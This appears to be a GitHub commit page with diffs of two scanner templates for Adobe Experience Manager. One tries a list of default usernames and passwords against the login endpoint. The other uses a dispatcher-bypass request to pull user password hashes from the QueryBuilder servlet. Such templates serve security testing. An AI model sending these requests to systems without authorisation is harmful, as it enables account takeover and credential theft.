-
Notifications
You must be signed in to change notification settings - Fork 272
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
69d7702
commit c815775
Showing
1,778 changed files
with
105,601 additions
and
436,790 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20240920 | ||
20240921 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,11 +1,18 @@ | ||
id: aem-default-login | ||
|
||
info: | ||
name: Adobe AEM Default Login | ||
author: random-robbie | ||
severity: critical | ||
severity: high | ||
description: Adobe AEM default login credentials were discovered. | ||
reference: | ||
- https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L | ||
cvss-score: 8.3 | ||
cwe-id: CWE-522 | ||
metadata: | ||
shodan-query: http.component:"Adobe Experience Manager" | ||
tags: aem,default-login,adobe | ||
|
||
requests: | ||
- raw: | ||
- | | ||
|
@@ -16,31 +23,37 @@ requests: | |
Referer: {{BaseURL}}/libs/granite/core/content/login.html | ||
_charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true | ||
attack: pitchfork | ||
payloads: | ||
aem_user: | ||
- admin | ||
- grios | ||
- replication-receiver | ||
- vgnadmin | ||
|
||
- author | ||
- anonymous | ||
- [email protected] | ||
- [email protected] | ||
aem_pass: | ||
- admin | ||
- password | ||
- replication-receiver | ||
- vgnadmin | ||
|
||
- author | ||
- anonymous | ||
- jdoe | ||
- aparker | ||
stop-at-first-match: true | ||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
part: header | ||
condition: and | ||
words: | ||
- login-token | ||
- crx.default | ||
condition: and | ||
|
||
# Enhanced by mp on 2022/03/23 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,29 +1,28 @@ | ||
id: aem-hash-querybuilder | ||
|
||
info: | ||
author: DhiyaneshDk | ||
name: Query hashed password via QueryBuilder Servlet | ||
severity: medium | ||
reference: https://twitter.com/AEMSecurity/status/1372392101829349376 | ||
tags: aem | ||
|
||
requests: | ||
- raw: | ||
- | | ||
GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 | ||
Host: {{Hostname}} | ||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | ||
Accept-Language: en-US,en;q=0.5 | ||
Accept-Encoding: gzip, deflate | ||
Connection: close | ||
Upgrade-Insecure-Requests: 1 | ||
Cache-Control: max-age=0 | ||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- '"success":true' | ||
- 'rep:password' | ||
condition: and |
Oops, something went wrong.